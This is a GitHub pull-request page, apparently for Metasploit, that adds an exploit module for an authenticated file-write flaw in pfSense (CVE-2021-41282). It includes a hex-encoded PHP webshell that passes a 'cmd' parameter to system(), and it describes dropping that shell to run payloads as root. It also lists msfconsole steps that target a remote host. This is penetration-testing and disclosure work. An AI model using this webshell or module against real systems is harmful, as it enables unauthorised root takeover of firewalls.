-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.
Already on GitHub? Sign in to your account
pfSense Authenticated File Write (CVE-2021-41282) #16245
Conversation
For anyone making a test VM, pfsense does not always like the default SCSI hard drives. In the past on ESXi, I have needed to specify an IDE interface HDD controller for the boot device. |
Meh; I have a target for this. I'll grab it.
|
print_status("Uploading webshell to #{webshell_location}") | ||
|
||
# php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>' | ||
php_shell = '\\x3c\\x3fphp+if($_GET[\\x22cmd\\x22])+\\x7b+system($_GET[\\x22cmd\\x22])\\x3b+\\x7d+\\x3f\\x3e' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
We may want to consider something in the future to make this pattern of using a PHP webshell more reusable. Not something we need to handle in this PR but the pattern of dropping a webshell seems to be coming up more often.
Release NotesThis PR adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface. |
Description
This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the
WebCfg - Diagnostics: Routing tables
privilege. This module uses the vulnerability to create a web shell and execute payloads withroot
privileges.pfSense's HTTP interface actually allows for arbitrary command execution by the admin user by default (which might be worth it's own module), but it also has very granular permissions for other users - down to the specific page. The installation instructions discuss how to create a user that only has access to the routing diagnostics page.
For some reason, there are many of these internet facing (52kish).
The one thing I don't care for about this module is that it deviates from other pfSense modules
check
implementations. The others extract the version string from the Dashboard view. However, that assumes the user has privileges to see the Dashboard which isn't a prerequisite to exploit this issue. So I opted to write an exploitcheck
, which could leave a file behind on the target 馃しTwo other less useful but worth throwing-out-there observations:
modules/exploits/unix
. I thought this belonged inmodules/exploits/freebsd
but I stashed this inunix
with the others for consistency. 馃しVerification
msfconsole
use exploit/unix/http/pfsense_diag_routes_webshell
set username <name>
set password <password>
set RHOST <ip>
check
set LHOST <ip>
exploit
Video || GTFO
https://www.youtube.com/watch?v=cgtxDXJdtPY
PCAP || GTFO
pfsense_diag_reverse.zip